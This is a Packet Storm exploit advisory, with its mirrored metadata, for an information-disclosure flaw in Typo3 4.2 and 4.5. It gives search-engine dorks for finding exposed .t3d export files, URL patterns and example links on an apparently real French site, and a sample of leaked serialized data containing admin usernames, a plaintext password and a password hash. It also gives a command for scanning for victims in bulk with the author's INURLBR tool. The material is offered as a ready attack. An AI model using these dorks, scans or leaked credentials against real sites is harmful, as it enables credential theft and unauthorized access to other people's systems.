ID PACKETSTORM:133961
Type packetstorm
Reporter Cleiton Pinheiro
Modified 2015-10-14T00:00:00
Description
`*INFORMAÇÕES:*
# ----------------------------------------------------------
#[+] Name: (0day) Typo3 - Full Info Disclosure
#[+] Type: Full Info Disclosure
#[+] Vendor: https://typo3.org/typo3-cms/
#[+] VULNERABLE VERSIONS: 4.2, 4.5
# ----------------------------------------------------------
#[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL #[+] EMAIL:
inurlbr@gmail.com #[+] Blog: http://blog.inurl.com.br #[+] Twitter:
https://twitter.com/googleinurl #[+] Fanpage: https://fb.com/InurlBrasil
#[+] Pastebin http://pastebin.com/u/Googleinurl #[+] GIT:
https://github.com/googleinurl #[+] PSS:
http://packetstormsecurity.com/user/googleinurl #[+] EXA:
http://exploit4arab.net/author/248/Cleiton_Pinheiro #[+] YOUTUBE:
http://youtube.com/c/INURLBrasil #[+] PLUS: http://google.com/+INURLBrasil
#[+] IRC: irc.pŕiv8.jp <http://irc.xn--piv8-q4a.jp> / #inurlbrasil
#[+] SEARCH DORKS:
/fileadmin/utopia ext:xml
/fileadmin/utopia*.t3d.xml
site:fr /fileadmin/utopia ext:xml
"utopia" inurl:t3d ext:xml
/fileadmin/ typo3 ext:t3d
# ----------------------------------------------------------
*#[+] POC FILE .XML:*
http://{server}/fileadmin/utopia{random}.t3d.xml
http://{server}/subdir/fileadmin/utopia{random}.t3d.xml
*#[+] **Ex:*
http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml
http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml
*#[+] PRINT:*
https://3.bp.blogspot.com/-cfVOTa_fbmQ/Vh3kC8v14cI/AAAAAAAABaA/kDEy3Ui9Mbg/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A12%253A34.png
*#[+] POC FILE .**T3D:*
http://{server}/fileadmin/*.t3d
http://{server}/fileadmin/archives_site/*.t3d
http://{server}/subdir/fileadmin/*.t3d
*#[+] **Ex:*
http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d
http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d
*#[+] **Example file contents:*
s:11:"admin_xxxx";s:5:"email";s:26:"admin@xxxx-autoxxxx.fr";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"admin@xxx-autopartage.fr";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1
*#[+] **Validation in mass using SCANNER INURLBR**:*
*# Download: **https://github.com/googleinurl/SCANNER-INURLBR
<https://github.com/googleinurl/SCANNER-INURLBR>*
*#[+] **COMMAND:*
php inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a
'<username>'
*#Result print:*
https://3.bp.blogspot.com/-JBREv-QJRRc/Vh3oH-HnhlI/AAAAAAAABaM/eXzM1uUOcxk/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A29%253A37.png
`
{"type": "packetstorm", "published": "2015-10-14T00:00:00", "reporter": "Cleiton Pinheiro", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8a0ad52e2562b38dead939830738f254"}, {"key": "modified", "hash": "b36e0c450721a2c39818d05cc31e3842"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b36e0c450721a2c39818d05cc31e3842"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9deef18fc40565f59e94e462b7981f80"}, {"key": "sourceData", "hash": "b0e0e499f26a6d897113c790679ce890"}, {"key": "sourceHref", "hash": "aa921d3432d96ca4a014ca047a5ee403"}, {"key": "title", "hash": "941c1555c995a4bb76eeb474f1b54221"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`*INFORMA\u00c7\u00d5ES:* \n \n# ---------------------------------------------------------- \n \n#[+] Name: (0day) Typo3 - Full Info Disclosure \n \n#[+] Type: Full Info Disclosure \n \n#[+] Vendor: https://typo3.org/typo3-cms/ \n#[+] VULNERABLE VERSIONS: 4.2, 4.5 \n \n# ---------------------------------------------------------- \n \n#[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL #[+] EMAIL: \ninurlbr@gmail.com #[+] Blog: http://blog.inurl.com.br #[+] Twitter: \nhttps://twitter.com/googleinurl #[+] Fanpage: https://fb.com/InurlBrasil \n#[+] Pastebin http://pastebin.com/u/Googleinurl #[+] GIT: \nhttps://github.com/googleinurl #[+] PSS: \nhttp://packetstormsecurity.com/user/googleinurl #[+] EXA: \nhttp://exploit4arab.net/author/248/Cleiton_Pinheiro #[+] YOUTUBE: \nhttp://youtube.com/c/INURLBrasil #[+] PLUS: http://google.com/+INURLBrasil \n#[+] IRC: irc.p\u0155iv8.jp <http://irc.xn--piv8-q4a.jp> / #inurlbrasil \n \n \n#[+] SEARCH DORKS: \n \n/fileadmin/utopia ext:xml \n \n/fileadmin/utopia*.t3d.xml \nsite:fr /fileadmin/utopia ext:xml \n\"utopia\" inurl:t3d ext:xml \n/fileadmin/ typo3 ext:t3d \n \n# ---------------------------------------------------------- \n \n \n*#[+] POC FILE .XML:* \n \n \nhttp://{server}/fileadmin/utopia{random}.t3d.xml \n \nhttp://{server}/subdir/fileadmin/utopia{random}.t3d.xml \n \n*#[+] **Ex:* \n \nhttp://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml \n \nhttp://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml \n*#[+] PRINT:* \nhttps://3.bp.blogspot.com/-cfVOTa_fbmQ/Vh3kC8v14cI/AAAAAAAABaA/kDEy3Ui9Mbg/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A12%253A34.png \n \n*#[+] POC FILE .**T3D:* \n \nhttp://{server}/fileadmin/*.t3d \n \nhttp://{server}/fileadmin/archives_site/*.t3d \n \nhttp://{server}/subdir/fileadmin/*.t3d \n \n*#[+] **Ex:* \n \nhttp://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d \n \nhttp://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d \n \n \n*#[+] **Example file contents:* \n \ns:11:\"admin_xxxx\";s:5:\"email\";s:26:\"admin@xxxx-autoxxxx.fr\";s:8:\"username\";s:10:\"adminxxx\";s:8:\"password\";s:10:\"adminlilas\";s:7:\"origUid\";a:2:{i:0;s:2:\"10\";i:1;s:14:\"Administrateur\";}}}}i:3;a:1:{s:8:\"fe_users\";a:1:{i:100;a:4:{s:4:\"name\";s:10:\"user_xxx\";s:5:\"email\";s:26:\"admin@xxx-autopartage.fr\";s:8:\"username\";s:9:\"userxxx\";s:8:\"password\";s:32:\"dcd9e367d292b7019fab159ab8c8c26a\";}}}i:4;a:1:{s:17:\"tx_icsutopia_site\";a:1:{i:1;a:4:{s:6:\"level0\";s:2:\"72\";s:6:\"level1\";s:2:\"73\";s:6:\"level2\";s:3:\"232\";s:10:\"base_model\";s:9:\"72,73,232\";}}}}s:3:\"t3d\";s:43:\"/www/html/typo3temp/utopia519e1b3d6c76b.t3d\";}}s:15:\"relStaticTables\";a:1 \n \n \n*#[+] **Validation in mass using SCANNER INURLBR**:* \n*# Download: **https://github.com/googleinurl/SCANNER-INURLBR \n<https://github.com/googleinurl/SCANNER-INURLBR>* \n \n*#[+] **COMMAND:* \nphp inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a \n'<username>' \n \n*#Result print:* \nhttps://3.bp.blogspot.com/-JBREv-QJRRc/Vh3oH-HnhlI/AAAAAAAABaM/eXzM1uUOcxk/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A29%253A37.png \n`\n", "viewCount": 8, "history": [], "lastseen": "2016-11-03T10:16:45", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/133961/Typo3-4.2-4.5-Information-Disclosure.html", "sourceHref": "https://packetstormsecurity.com/files/download/133961/typo345-disclose.txt", "title": "Typo3 4.2 / 4.5 Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "references": [], "id": "PACKETSTORM:133961", "hash": "3462b1ccefdc0cb2a161817dd3b279b21294514d1a8fe9eb973fcb9b8b65f32a", "edition": 1, "cvelist": [], "modified": "2015-10-14T00:00:00", "description": ""}
{}
